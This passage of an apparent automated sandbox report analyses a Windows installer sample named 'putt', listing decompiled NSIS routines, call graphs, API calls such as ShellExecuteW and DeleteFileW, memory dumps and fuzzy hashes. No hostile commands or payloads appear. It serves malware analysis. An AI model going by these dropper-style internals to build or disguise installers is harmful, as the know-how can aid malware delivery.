API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                    • String ID: jF
                                                                                                                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                    Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                    Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                    • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                    • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                    Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00424579,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                    • String ID: (]C$... %d%%$pAB$yEB
                                                                                                                                                                                                                                                    • API String ID: 651206458-486274953
                                                                                                                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
